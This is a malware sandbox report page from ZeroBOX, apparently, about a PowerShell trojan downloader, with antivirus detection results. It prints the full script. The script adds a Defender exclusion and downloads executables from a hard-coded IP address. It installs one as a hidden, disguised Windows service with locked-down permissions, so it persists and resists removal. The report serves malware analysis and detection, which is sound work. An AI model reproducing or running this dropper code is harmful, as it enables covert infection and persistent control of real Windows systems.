popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
Add-MpPreference -ExclusionPath C:\ProgramData\Microsoft\Windows\WER\services.exe
$ErrorActionPreference= 'silentlycontinue'
(new-object Net.WebClient).DownloadFile('http://130.185.118.247:9090/tomcaterror.bmpqoq','C:\ProgramData\Microsoft\Windows\WER\services.exe')
(new-object Net.WebClient).DownloadFile('http://130.185.118.247:9090/nssm.exe','C:\ProgramData\Microsoft\Windows\Templates\services.exe')
(new-object Net.WebClient).DownloadFile('http://130.185.118.247:9090/lisence.shm','C:\ProgramData\Microsoft\Windows\WER\JavaCore.sys')
Add-MpPreference -ExclusionPath C:\ProgramData\Microsoft\Windows\WER\services.exe
$ErrorActionPreference= 'silentlycontinue'
C:\ProgramData\Microsoft\Windows\Templates\services.exe install "MSIInstall service" C:\ProgramData\Microsoft\Windows\WER\services.exe | Out-Null
C:\ProgramData\Microsoft\Windows\Templates\services.exe set "MSIInstall service" DisplayName "MSIInstall service" | Out-Null
C:\ProgramData\Microsoft\Windows\Templates\services.exe set "MSIInstall service" Description "Manages profiles and accounts on a SharedPC configured device" | Out-Null
C:\ProgramData\Microsoft\Windows\Templates\services.exe start "MSIInstall service" | Out-Null
C:\windows\system32\attrib +a +s +h +r C:\ProgramData\Microsoft\Windows\Templates\services.exe
$ErrorActionPreference= 'silentlycontinue'
C:\windows\system32\attrib +a +s +h +r C:\ProgramData\Microsoft\Windows\Wer\*
$ErrorActionPreference= 'silentlycontinue'
C:\Windows\system32\sc.exe sdset "msiinstall service" "D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)" | Out-Null
$ErrorActionPreference= 'silentlycontinue'
C:\Windows\system32\sc.exe sdset "msiinstall service" "D:(D;;DCLCWPDTSDCC;;;IU)(D;;DCLCWPDTSDCC;;;SU)(D;;DCLCWPDTSDCC;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)" | Out-Null
Antivirus Signature
Bkav Clean
Lionic Clean
ClamAV Clean
CTX powershell.downloader.generic
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
huorong Clean
Baidu Clean
VirIT Clean
Symantec ISB.Downloader!gen547
ESET-NOD32 PowerShell/TrojanDownloader.Agent.HDW
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky Clean
BitDefender Heur.BZC.PZQ.Boxter.928.AE10983F
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.PZQ.Boxter.928.AE10983F
Tencent Win32.Trojan-Downloader.Downloader.Simw
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Heur.BZC.PZQ.Boxter.928.AE10983F
TrendMicro Clean
CMC Clean
Emsisoft Heur.BZC.PZQ.Boxter.928.AE10983F (B)
Ikarus Win32.Outbreak
FireEye Heur.BZC.PZQ.Boxter.928.AE10983F
Jiangmin Clean
Varist ABDownloader.WJZ
Avira Clean
Fortinet Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.PZQ.Boxter.928.AE10983F
SUPERAntiSpyware Clean
Microsoft Trojan:Script/Wacatac.B!ml
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
SentinelOne Clean
MaxSecure Clean
GData Heur.BZC.PZQ.Boxter.928.AE10983F
AVG Script:SNH-gen [Trj]
Panda Clean
alibabacloud Trojan[downloader]:Win/BZC.POV
No IRMA results available.